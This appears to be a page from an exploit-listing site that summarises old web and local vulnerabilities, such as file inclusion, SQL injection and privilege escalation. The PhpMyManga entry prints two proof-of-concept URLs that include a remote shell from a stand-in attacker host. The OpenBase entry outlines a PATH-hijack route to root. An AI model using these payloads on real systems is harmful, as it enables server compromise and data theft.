header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

PhpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities

Input passed to the 'actionsPage' or 'formPage' parameter in template.php is not sanitized before being used to include files. Proof of concept: http://[target]/[path]/template.php?actionsPage=http://evilsite.com/shell.php? http://[target]/[path]/template.php?formPage=http://evilsite.com/shell.php?

P-News 1.16, 1.17 Remote File Inclusion Vulnerability

P-News 1.16 and 1.17 are vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the pn_lang parameter that points to a malicious file on a remote server. If successful, the malicious file will be executed on the vulnerable server.

Boonex Dolphin 5.2 Remote Command Execution / File Inclusion Vulnerability

This vulnerability allows an attacker to execute arbitrary code on the vulnerable system. It requires register globals to be on, and magic quotes gpc to be off. The attacker can send a malicious HTTP request containing a base64 encoded payload to the vulnerable server in order to execute arbitrary code. The attacker can also use the File Inclusion vulnerability to include a remote file containing malicious code on the vulnerable server.

Comdev One Admin 4.1 Remote Command Execution / File Inclusion Vulnerability

Comdev One Admin 4.1 is vulnerable to Remote Command Execution and File Inclusion. This vulnerability requires register globals to be on, and magic quotes gpc to be off. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server. The malicious request contains a base64 encoded payload which is then decoded and executed on the server. The attacker can also use the File Inclusion vulnerability to read sensitive files from the server.

raptor_libnspr2 – Solaris 10 libnspr LD_PRELOAD exploit

Local exploitation of a design error vulnerability in version 4.6.1 of NSPR, as included with Sun Microsystems Solaris 10, allows attackers to create or overwrite arbitrary files on the system. The problem exists because environment variables are used to create log files. Even when the program is setuid, users can specify a log file that will be created with elevated privileges.

WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

A remote SQL injection vulnerability exists in WebSPELL <= 4.01.01. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Def-Blog <= v1.0.1 (article) Remote SQL Injection Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'article' parameter of the 'comadd.php' script. A remote attacker can execute arbitrary SQL commands in the application database, compromise the application, access or modify sensitive data, exploit latent vulnerabilities in the underlying database, etc.

DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit

DigitalHive v2.0 RC2 is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious URL in the 'page' parameter of the vulnerable script. This can allow an attacker to execute arbitrary code on the vulnerable server.

OpenBase Binary Calls gnutar Vulnerability

This is an exploit for a 3rd party program that has been bundled with Xcode on several occasions. The OpenBase binary calls gnutar while running with euid=0 by passing TAR_OPTIONS we can cause gzip to be invoked. Since no path is specified we can export PATH=/path/to/trojan:$PATH in order to take root.

Recent Exploits: